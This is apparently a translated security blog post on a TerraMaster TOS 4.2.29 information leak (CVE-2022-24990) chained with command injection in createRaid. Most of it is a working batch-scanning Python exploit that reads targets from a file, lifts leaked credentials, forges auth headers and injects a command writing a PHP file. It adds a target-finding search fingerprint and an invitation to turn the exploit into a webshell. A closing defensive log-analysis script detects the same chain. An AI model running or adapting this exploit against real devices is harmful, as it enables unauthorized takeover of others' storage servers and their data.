TerraMaster TOS is a Linux-based operating system from the Chinese company TerraMaster, built specifically for TerraMaster cloud-storage NAS servers. TerraMaster TOS version 4.2.29 contains a command injection vulnerability caused by improper input validation in the webNasIPS component of the api.php script. An unauthenticated attacker can send crafted data to exploit it and execute arbitrary commands on the target system. The createRaid method in TerraMaster TOS's mobile.class.php file has a remote command execution vulnerability; combined with CVE-2022-24990, an attacker can take control of the server.
TOS version: 4.2.29
Search fingerprint: body="TOS Loading" && title!="- CoreAPI" "TerraMaster" && header="TOS"
A PoC is already available on GitHub.
The PoC is as follows:
import time
import re
import hashlib
import requests


def title():
    # Banner (the original printed a large ASCII-art "painter" logo here)
    print('''
    painter
    What is black and what is white
    blog: https://www.cnblogs.com/painter-sec
    Team: base64 安全团队
    ''')


def usage():
    print("""
    用法:python3 TerraMaster TOS 信息泄露漏洞+RCE.py
    前提:在脚本所在文件夹下放入:host.txt 目标
    """)


def poc_getinfo(target):
    # Step 1: query the webNasIPS endpoint (CVE-2022-24990) with the TNAS User-Agent
    print("[+]正则检测:{}".format(target))
    headers = {"User-Agent": "TNAS"}
    payload = target + "/module/api.php?mobile/webNasIPS"
    try:
        req = requests.get(url=payload, headers=headers).content.decode("utf-8")
        if "successful" in req:
            print("[+]存在信息泄露漏洞:{}".format(payload))
            print(' [-]泄露信息:' + req)
            # Record the vulnerable URL, then move on to the createRaid check
            with open("poc1_vul.txt", "a+", encoding="utf-8") as f:
                f.write(payload + '\n')
            poc_execute(req, target)
    except Exception:
        pass


def poc_execute(req, target):
    # Step 2: derive the Authorization/Signature headers from the leaked response
    # and call createRaid, whose raidtype parameter is the injection point
    print("[+]开始进行命令执行检测---")
    req = str(req)
    mac = str(re.findall(r"ADDR:(.*?)\\", req)[0][-6:])
    authorization = re.findall(r"PWD:(.*?)\\", req)[0]
    timestamp = str(int(time.time()))
    signature = hashlib.md5((mac + timestamp).encode("utf-8")).hexdigest()
    data = {"raidtype": ';echo "<?php phpinfo();?>">vuln1.php', "diskstring": "XXXX"}
    headers = {
        "Authorization": authorization,
        "Signature": signature,
        "Timestamp": timestamp,
        "User-Agent": "TNAS",
    }
    payload = target + '/module/api.php?mobile/createRaid'
    req2 = requests.post(url=payload, headers=headers, data=data).content.decode("utf-8")
    if "successful" in req2:
        print("[+]命令执行成功,成功写入phpinfo文件,文件地址:{}".format(target + '/module/vuln1.php'))


if __name__ == '__main__':
    title()
    usage()
    with open("host.txt", 'r', encoding="utf-8") as f:
        temp = f.readlines()
    for target in temp:  # a URL file can also be iterated here
        target = target.strip().rstrip("/")
        poc_getinfo(target)
Then put the batch of URLs into host.txt and run python3 poc.py to see the results; vulnerable URLs are saved to poc1_vul.txt.
Afterwards, check the PHP file that was written.
If you want to write a webshell, modify the code yourself.
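From the defender's side, the request flow the PoC relies on (a GET to the webNasIPS endpoint, then a POST to createRaid from the same source) is visible in the NAS web-server access log. The following is an added example, not part of the original post or the PoC author's code; the log lines and client addresses are constructed, and it assumes the combined log format.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jun/2022:12:00:01 +0000] "GET /module/api.php?mobile/webNasIPS HTTP/1.1" 200 512 "-" "TNAS"
203.0.113.5 - - [10/Jun/2022:12:00:02 +0000] "POST /module/api.php?mobile/createRaid HTTP/1.1" 200 88 "-" "TNAS"
198.51.100.7 - - [10/Jun/2022:12:05:00 +0000] "GET /tos/index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jun/2022:12:05:09 +0000] "GET /module/api.php?mobile/webNasIPS HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

INFO_LEAK = "/module/api.php?mobile/webNasIPS"   # CVE-2022-24990 endpoint
RCE_SINK = "/module/api.php?mobile/createRaid"   # createRaid command injection


def analyze(log_text):
    """Map each client IP to the suspicious events seen, in log order."""
    leaked = set()                     # IPs that already pulled webNasIPS
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                   # skip lines that are not combined-format
        ip, method, path, status, ua = m.group("ip", "method", "path", "status", "ua")
        if path == INFO_LEAK:
            leaked.add(ip)
            findings[ip].append(("info_leak", status, ua))
        elif method == "POST" and path == RCE_SINK:
            # createRaid right after webNasIPS from the same source matches the PoC flow
            kind = "rce_after_leak" if ip in leaked else "rce_attempt"
            findings[ip].append((kind, status, ua))
    return dict(findings)


def chained_sources(log_text):
    """IPs that completed the leak -> createRaid chain with a 200 on the POST."""
    return sorted(
        ip for ip, events in analyze(log_text).items()
        if any(k == "rce_after_leak" and st == "200" for k, st, _ in events)
    )
```

A lone webNasIPS request (as from 198.51.100.7 above) is only an indicator; the createRaid POST after it is what should page someone, and on a patched TOS the POST should not return "successful".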
Original article: https://blog.csdn.net/weixin_43080961/article/details/125134569